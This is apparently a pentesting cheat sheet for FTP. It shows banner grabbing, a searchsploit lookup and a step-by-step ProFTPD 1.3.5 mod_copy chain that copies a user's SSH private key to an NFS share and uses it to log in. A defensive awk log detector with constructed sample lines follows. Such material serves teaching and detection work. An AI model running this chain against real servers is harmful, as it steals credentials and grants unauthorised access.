21 - ftp
Enumeration
Use netcat to grab the FTP banner and identify the server version
nc $IP 21
Use searchsploit to look up Exploit-DB entries for the identified FTP server version
searchsploit ftp 1.2.3
Exploitation examples
ProFTPD 1.3.5 mod_copy
ProFTPD 1.3.5 has a vulnerability in the mod_copy module that allows the SITE CPFR and SITE CPTO commands to be sent via netcat to copy files on the server. In this example we chain this exploit to copy Bob's SSH keys to a misconfigured NFS share, then mount the share on our attack machine to access the SSH keys.
# Use netcat to copy the file into an NFS share
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy successful
# Mount the NFS share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs
# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
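The defender's view of the chain above, as an added example that is not part of the original notes: a log check that pairs each accepted SITE CPFR with the SITE CPTO that completes it and rates the copy. The function name `detect_mod_copy`, the severity labels, the sensitive-path list and the log layout (ProFTPD ExtendedLog style, `%h %l %u %t "%r" %s %b`, with `-` as the user when nobody is logged in) are assumptions, and the sample lines are constructed.

```sh
#!/bin/sh
# Constructed sample in ProFTPD ExtendedLog style (assumed format: %h %l %u %t "%r" %s %b).
SAMPLE_LOG='192.0.2.10 UNKNOWN - [12/Mar/2024:10:01:02 +0000] "SITE CPFR /home/bob/.ssh/id_rsa" 350 -
192.0.2.10 UNKNOWN - [12/Mar/2024:10:01:05 +0000] "SITE CPTO /var/tmp/id_rsa" 250 -
198.51.100.7 UNKNOWN alice [12/Mar/2024:10:05:00 +0000] "RETR report.pdf" 226 1024
198.51.100.7 UNKNOWN alice [12/Mar/2024:10:06:10 +0000] "site cpfr /srv/ftp/a.txt" 350 -
198.51.100.7 UNKNOWN alice [12/Mar/2024:10:06:12 +0000] "site cpto /srv/ftp/b.txt" 250 -
203.0.113.5 UNKNOWN - [12/Mar/2024:10:09:00 +0000] "SITE CPFR /etc/shadow" 550 -'

# detect_mod_copy: read log lines on stdin, print one line per completed
# server-side copy (CPFR accepted with 350, then CPTO answered with 250).
# Pairs are keyed by client host, a simplification; use a session id if logged.
detect_mod_copy() {
  awk '
  BEGIN { sens = "(/\\.ssh/|/etc/shadow$|/id_[a-z0-9]+$)" }  # illustrative list
  {
    if (split($0, q, "\"") < 3) next          # no quoted request on this line
    req = q[2]
    split(q[1], pre, " ");  host = pre[1]; user = pre[3]
    split(q[3], post, " "); status = post[1]
    cmd = toupper(substr(req, 1, 10))         # FTP verbs are case-insensitive
    path = substr(req, 11)
    if (cmd == "SITE CPFR ") {
      if (status == "350") src[host] = path; else delete src[host]
      next
    }
    if (cmd == "SITE CPTO " && status == "250" && (host in src)) {
      sev = "INFO"
      if (user == "-") sev = "HIGH"           # copy with no logged-in user
      else if (src[host] ~ sens) sev = "MEDIUM"
      printf "%s host=%s user=%s src=%s dst=%s\n", sev, host, user, src[host], path
      delete src[host]
    }
  }'
}

printf '%s\n' "$SAMPLE_LOG" | detect_mod_copy
```

On the FTP server, alerts whose dst sits under a directory listed in /etc/exports deserve priority, since that is the path the chain above uses to get the copied file off the host.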